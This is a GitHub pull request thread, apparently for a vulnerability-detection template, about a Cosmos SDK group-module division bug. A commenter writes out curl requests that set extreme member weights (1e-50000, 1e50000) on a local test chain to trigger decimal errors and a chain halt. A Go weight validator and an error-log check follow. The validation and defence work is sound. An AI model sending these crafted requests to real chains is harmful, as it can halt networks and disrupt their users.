Added template for cosmos-sdk-division-bug #12014


Status: Open. Wants to merge 1 commit into base: main.

Conversation

@pdteamx (Contributor) commented Apr 25, 2025

Added template for cosmos-sdk-division-bug

@princechaddha (Member)

Hello, thank you so much for sharing this template with the community and contributing to this project.

Could you please share more details about the issue, and if possible, provide the steps to set up a vulnerable environment to help validate it?

@MuhammadWaseem29

Hi,

Thank you for your response and interest in the Cosmos SDK Division Bug Exploit template. Below, I’ve provided additional details about the issue and steps to set up a vulnerable environment for validation.

Issue Details

The vulnerability stems from a division error in the Cosmos SDK’s group module, specifically in the handling of group member weights during policy evaluation. When extreme weight values (e.g., very large or very small decimals) are used, the SDK’s decimal arithmetic can encounter precision errors, such as "decimal quotient error" or "exponent out of range." This can lead to a chain halt, disrupting consensus and potentially causing significant downtime. The issue is critical as it affects the integrity of group-based governance mechanisms.

References:

Setting Up a Vulnerable Environment

To validate the exploit, you can set up a local Cosmos SDK-based blockchain with a vulnerable version (e.g., Cosmos SDK v0.46.x or earlier, prior to the patch). Below are the steps:

  1. Prerequisites:

    • Install Go (v1.18 or later).
    • Install Docker for running a local testnet (optional but recommended).
    • Clone the Cosmos SDK repository:
      git clone https://github.com/cosmos/cosmos-sdk.git
      cd cosmos-sdk
      git checkout v0.46.0
  2. Build and Install:

    • Build the Cosmos SDK binary:
      make install
    • Ensure simd (the Cosmos SDK binary) is in your $GOPATH/bin.
  3. Set Up a Local Testnet:

    • Initialize a single-node testnet:
      simd init testnet --chain-id test-1
    • Generate a genesis file and add initial accounts:
      simd add-genesis-account cosmos14xzyhnr8w098awcf8l6t57qw3qlhcwsntytvm0 1000000stake
      simd add-genesis-account cosmos18v59wacnwz89qphdez62m6nn7qse8mgfr7m0lk 1000000stake
      simd gentx cosmos14xzyhnr8w098awcf8l6t57qw3qlhcwsntytvm0 1000000stake --chain-id test-1
      simd collect-gentxs
    • Start the node:
      simd start
  4. Reproduce the Vulnerability:

    • Use a tool like curl or a REST client to send the HTTP requests from the template:
      • Step 1: Add group members with extreme weights (very small: 1e-50000, very large: 1e50000):
        curl -X POST http://localhost:1317/group/members -H "Content-Type: application/json" -d '{
          "members": [
            {"address": "cosmos14xzyhnr8w098awcf8l6t57qw3qlhcwsntytvm0", "weight": "1e-50000"},
            {"address": "cosmos18v59wacnwz89qphdez62m6nn7qse8mgfr7m0lk", "weight": "1e50000"}
          ]
        }'
      • Step 2: Submit a group proposal that triggers policy evaluation:
        curl -X POST http://localhost:1317/group/proposals -H "Content-Type: application/json" -d '{
          "group_policy_address": "cosmos17pmq7hp4upvmmveqexzuhzu64v36re3w3447n7dt46uwp594wtpsqv4fn5",
          "messages": [
            {
              "@type": "/cosmos.bank.v1beta1.MsgSend",
              "from_address": "cosmos17pmq7hp4upvmmveqexzuhzu64v36re3w3447n7dt46uwp594wtpsqv4fn5",
              "to_address": "cosmos14xzyhnr8w098awcf8l6t57qw3qlhcwsntytvm0",
              "amount": [{"denom": "stake", "amount": "10"}]
            }
          ],
          "metadata": "",
          "title": "Crash Test",
          "summary": "Testing large and small weights for policy",
          "proposers": ["cosmos14xzyhnr8w098awcf8l6t57qw3qlhcwsntytvm0"]
        }'
    • Monitor the node logs for errors like decimal quotient error or exponent out of range, indicating the vulnerability was triggered. The node may halt or fail to process the proposal.
  5. Expected Outcome:

    • The node should encounter a division error during the group policy evaluation, potentially causing a chain halt.
    • The HTTP response or node logs should contain error messages matching the template’s matchers (decimal quotient error or exponent out of range).
  6. Cleanup:

    • Stop the node (Ctrl+C) and remove the testnet data:
      rm -rf ~/.simapp

Notes

  • Ensure the Cosmos SDK version is unpatched (pre-v0.47.0 or the specific patched commit). Patched versions mitigate this issue by adding bounds checks on weights.
  • If you encounter issues with the REST API, verify the node is running with the API enabled (--api.enable true in the simd start command).
  • For a more realistic test, you can use a multi-node testnet setup with tools like ignite or starport, but a single-node setup should suffice for this validation.

Please let me know if you need further clarification or assistance in setting up the environment. I’d be happy to help troubleshoot or provide additional details!

Best regards,
Muhammad Waseem
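A defensive counterpart to the reproduction above, added here as an example and not code from the nuclei-templates project, the Cosmos SDK, or the commenter: a Go input validator that bounds member weights before any decimal arithmetic runs on them (the kind of bounds check the Notes above say patched versions added), plus a log check for the two error strings the template matches on. The weight limits (1e-18 to 1e18), the 64-character length cap, the `Member` struct and the sample log lines are all assumptions constructed for this example and are not taken from the SDK.

```go
package main

import (
	"errors"
	"fmt"
	"math/big"
	"regexp"
	"strconv"
	"strings"
)

// Hypothetical bounds for a group member weight. The comment above reports
// that weights like 1e-50000 and 1e50000 push the SDK's decimal arithmetic
// into "decimal quotient error" / "exponent out of range"; these limits are
// an assumption chosen for illustration, not values from the Cosmos SDK.
const (
	maxWeightLen = 64 // assumption: reject absurdly long numeric strings up front
	minExponent  = -18
	maxExponent  = 18
)

var (
	ErrWeightMalformed   = errors.New("weight: malformed decimal")
	ErrWeightNotPositive = errors.New("weight: must be positive")
	ErrWeightOutOfRange  = errors.New("weight: out of accepted range")

	// Unsigned decimal with optional fraction and optional exponent ("2.5", "1e-3").
	// Group 1 captures the exponent so it can be bounded before parsing.
	weightRe = regexp.MustCompile(`^[0-9]+(?:\.[0-9]+)?(?:[eE]([+-]?[0-9]+))?$`)

	lowerBound, _ = new(big.Rat).SetString("1e-18") // assumption: smallest accepted weight
	upperBound, _ = new(big.Rat).SetString("1e18")  // assumption: largest accepted weight
)

// ValidateWeight checks a member weight string before any arithmetic is done
// on it. The exponent is bounded before the value is materialised, so a string
// like "1e50000" is rejected cheaply instead of being expanded first.
func ValidateWeight(s string) (*big.Rat, error) {
	if len(s) == 0 || len(s) > maxWeightLen {
		return nil, ErrWeightMalformed
	}
	m := weightRe.FindStringSubmatch(s)
	if m == nil {
		return nil, ErrWeightMalformed
	}
	if m[1] != "" {
		exp, err := strconv.Atoi(m[1])
		if err != nil || exp < minExponent || exp > maxExponent {
			return nil, ErrWeightOutOfRange
		}
	}
	r, ok := new(big.Rat).SetString(s)
	if !ok {
		return nil, ErrWeightMalformed
	}
	if r.Sign() <= 0 {
		return nil, ErrWeightNotPositive
	}
	// The exponent check above is only a cheap pre-filter; a long mantissa
	// such as "10000000000000000000" still has to be compared against the bounds.
	if r.Cmp(lowerBound) < 0 || r.Cmp(upperBound) > 0 {
		return nil, ErrWeightOutOfRange
	}
	return r, nil
}

// Member mirrors the shape of the JSON in the reproduction request above.
type Member struct {
	Address string `json:"address"`
	Weight  string `json:"weight"`
}

// ValidateMembers rejects the whole request if any weight is unacceptable and
// otherwise returns the total weight, i.e. the value a tally would divide by.
func ValidateMembers(members []Member) (*big.Rat, error) {
	total := new(big.Rat)
	for i, mbr := range members {
		w, err := ValidateWeight(mbr.Weight)
		if err != nil {
			return nil, fmt.Errorf("member %d (%s): %w", i, mbr.Address, err)
		}
		total.Add(total, w)
	}
	if total.Sign() == 0 {
		return nil, fmt.Errorf("no members: %w", ErrWeightNotPositive)
	}
	return total, nil
}

// Pattern built from the matcher strings quoted in the comment above.
var arithmeticErrRe = regexp.MustCompile(`decimal quotient error|exponent out of range`)

// FindArithmeticErrors returns the node log lines an operator should alert on.
func FindArithmeticErrors(log string) []string {
	var hits []string
	for _, line := range strings.Split(log, "\n") {
		if arithmeticErrRe.MatchString(line) {
			hits = append(hits, line)
		}
	}
	return hits
}

// Constructed sample log for the detection check; not captured from a real node.
const sampleLog = `INF executed block height=12 module=state
ERR failed to tally proposal: decimal quotient error module=x/group
INF committed state height=13
ERR panic recovered: exponent out of range module=x/group`

func main() {
	hostile := []Member{
		{Address: "cosmos14xzyhnr8w098awcf8l6t57qw3qlhcwsntytvm0", Weight: "1e-50000"},
		{Address: "cosmos18v59wacnwz89qphdez62m6nn7qse8mgfr7m0lk", Weight: "1e50000"},
	}
	if _, err := ValidateMembers(hostile); err != nil {
		fmt.Println("rejected:", err)
	}
	total, _ := ValidateMembers([]Member{{Address: "a", Weight: "2.5"}, {Address: "b", Weight: "0.5"}})
	fmt.Println("accepted, total weight =", total.FloatString(2))
	for _, l := range FindArithmeticErrors(sampleLog) {
		fmt.Println("alert:", l)
	}
}
```

The order of checks matters: the length cap and the exponent bound run on the raw string, so a request carrying `1e50000` is refused before any big-number expansion, which keeps the validator itself from becoming the expensive step; the `big.Rat` comparison afterwards catches values that sneak past the exponent filter as a long mantissa.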

@MuhammadWaseem29

update

@DhiyaneshGeek DhiyaneshGeek added Status: In Progress This issue is being worked on, and has someone assigned. and removed waiting for more info labels Jun 11, 2025